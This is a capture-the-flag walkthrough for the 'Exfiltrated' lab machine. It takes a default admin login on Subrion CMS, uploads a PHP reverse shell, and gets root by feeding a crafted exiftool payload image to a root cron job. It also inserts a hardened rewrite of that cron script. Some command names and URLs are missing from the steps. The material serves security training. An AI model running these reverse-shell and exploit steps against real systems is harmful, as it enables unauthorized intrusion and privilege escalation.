
PG - Exfiltrated Walkthrough


  • Use Nmap to get the list of services running on the target.
  • Log in to the web app using default credentials.
  • Exploit the CMS, which is vulnerable to authenticated RCE.
  • Exploit a cron job to escalate privileges to root.


As usual, start with a basic port scan of the target machine.

Port Scan

$ nmap $ip -sVC -oN nmapInitial.txt -Pn


Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 43.71 seconds

Since an HTTP service is running, let's start enumerating it for any vulnerabilities we can exploit.

Web App Enumeration

First update your /etc/hosts file so you can access exfiltrated.offsec:

<target_ip> exfiltrated.offsec   # change ip accordingly

Once you are done updating, browse to the above domain.


Landing Page

There is a login page. Never forget to try a bunch of default credentials.


Login Page

You can successfully log in using the admin:admin credentials. Once logged in, you can find the version of the CMS the web application is using.


CMS Version


Initial Foothold

This version of Subrion CMS is vulnerable to authenticated RCE. According to the disclosure, we can upload a PHP script with the .phar or .pht extension.

Upload the PHP reverse shell script via /panel/uploads:

Upload Shell

I used the shell that is readily available in Kali Linux, i.e. /usr/share/webshells/php/php-reverse-shell.php. Just change the IP, port and extension.

Now start your netcat listener, and go to /uploads/<shell_name> to execute the script.

$ nc -nvlp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 37140
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 16:14:41 up  1:08,  0 users,  load average: 0.03, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
$ which python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

Don't forget to upgrade your shell to an interactive one for more stability.

Privilege Escalation

We get a shell as user www-data. Check the crontabs to see if there is any misconfiguration we can exploit to escalate our privileges.

www-data@exfiltrated:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.


# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/

We can see that one cron job runs a bash script as root every minute. Check the content of the script if possible.

www-data@exfiltrated:/$ cat /opt/
cat /opt/
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata

echo -ne "\n metadata directory cleaned! \n\n"

# The copy on this page omits the IMAGES and LOGFILE assignments:
# IMAGES follows the text below, LOGFILE is a placeholder for the original value.
IMAGES=/var/www/html/subrion/uploads
LOGFILE=/path/to/logfile

FILE=`openssl rand -hex 5`

echo -ne "\n Processing EXIF metadata now... \n\n"
# every *.jpg in the (www-data writable) upload directory is parsed by exiftool, as root
ls $IMAGES | grep "jpg" | while read filename; do
    exiftool "$IMAGES/$filename" >> $LOGFILE
done

echo -ne "\n\n Processing is finished! \n\n\n"

It looks for files with the .jpg extension in /var/www/html/subrion/uploads and runs exiftool on each of them.

Check the version of exiftool:

www-data@exfiltrated:/$ exiftool -ver
exiftool -ver

The installed version of exiftool is vulnerable to arbitrary code execution. Since it runs with root privileges, any code we inject will be executed as root.
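For the defender's side of the two findings above (a root cron job parsing files from a web-writable directory, and a parser bug in exiftool), here is a hardened rewrite of the cron script, added as an example and not the script from the box. It keeps the job's purpose but runs the parser without root, checks that each upload really starts with JPEG bytes and never follows symlinks; IMAGES comes from the walkthrough, while LOGFILE and the service account exifuser are assumed placeholders.

```shell
#!/bin/sh
# Hardened rewrite of the EXIF-collection cron job (added example).
# Assumptions: IMAGES follows the walkthrough; LOGFILE and the unprivileged
# account RUNAS are placeholders, not values from the box.
set -eu

IMAGES="${IMAGES:-/var/www/html/subrion/uploads}"
LOGFILE="${LOGFILE:-/var/log/exif-collect.log}"
RUNAS="${RUNAS:-exifuser}"     # assumed dedicated, non-login service account

# True only if the file starts with the JPEG SOI marker FF D8 FF.
# A DjVu or other container renamed to .jpg fails this check.
is_jpeg() {
    [ "$(head -c 3 "$1" | od -An -tx1 | tr -d ' \n')" = "ffd8ff" ]
}

# Only a regular file (no symlink pointing elsewhere) with real JPEG bytes
# is handed to the metadata parser.
is_safe_image() {
    [ -f "$1" ] && [ ! -L "$1" ] && is_jpeg "$1"
}

# Parse metadata as the unprivileged account: a bug in exiftool's parser
# then yields that account's privileges, not root's.
collect_metadata() {
    for f in "$IMAGES"/*.jpg; do        # glob, not `ls | grep`, so spaces survive
        [ -e "$f" ] || continue         # empty glob
        is_safe_image "$f" || { echo "skipped $f" >&2; continue; }
        runuser -u "$RUNAS" -- exiftool "$f" >> "$LOGFILE"
    done
}

# Self-check on constructed files: one real JPEG header, one fake, one symlink.
# Prints how many of the three pass is_safe_image (expected: 1).
self_test() {
    tmp=$(mktemp -d); n=0
    printf '\377\330\377\340JFIF' > "$tmp/real.jpg"   # bytes FF D8 FF E0
    printf 'AT&TFORM' > "$tmp/fake.jpg"               # DjVu-style header renamed
    ln -s "$tmp/real.jpg" "$tmp/link.jpg"
    for f in "$tmp"/*.jpg; do is_safe_image "$f" && n=$((n + 1)); done
    rm -rf "$tmp"; echo "$n"
}

case "${1:-}" in
    --self-test) self_test ;;
    --run) collect_metadata ;;
esac
```

Run it with --self-test to see the validation alone; --run is the cron entry, which no longer needs root at all once LOGFILE is writable by the service account.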

Information about the vulnerability:

Download the exploit from:

Create a malicious file using the exploit.

$ ./ "chmod +s /bin/bash"
Usage ./ <cmd to inject>
        Note: if your cmd contains unix special characters use quote!
        EG: ./ "curl|sh"
This poc generates an image file (notevil.jpg) to be proccessed by vulnerable exiftool.
And requires DjVuLibre to be installed and in PATH
[+] Preparing annotation file.
[+] Creating image file with: djvumake notevil.jpg INFO=0,0 BGjp=/dev/null ANTa=ant.out
[+] notevil.jpg created.

I am simply trying to set the SUID permission on /bin/bash for privilege escalation. You can try to get a reverse shell instead.

Now we need to transfer the malicious image to the target machine. I will be using a basic http.server to do so.

# In your machine, start a basic http.server using python
$ python3 -m http.server 8080
Serving HTTP on port 8080 ( ...

# now download the image in target machine using wget
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [image/jpeg]
Saving to: ‘notevil.jpg’                   
notevil.jpg         100%[===================>]     122  --.-KB/s    in 0s 
2021-09-08 14:54:21 (18.0 MB/s) - ‘notevil.jpg’ saved [122/122]

Now, move the image to /var/www/html/subrion/uploads and wait for the cron job to execute.

www-data@exfiltrated:/var/www/html/subrion/uploads$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18  2020 /bin/bash

Once done, just run bash -p to get the root shell.

www-data@exfiltrated:/var/www/html/subrion/uploads$ bash -p
bash -p
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# whoami

Get those flags

bash-5.0# cat proof.txt
cat proof.txt
bash-5.0# find / -type f -name local.txt 2>/dev/null
find / -type f -name local.txt 2>/dev/null
bash-5.0# cat /home/coaran/local.txt
cat /home/coaran/local.txt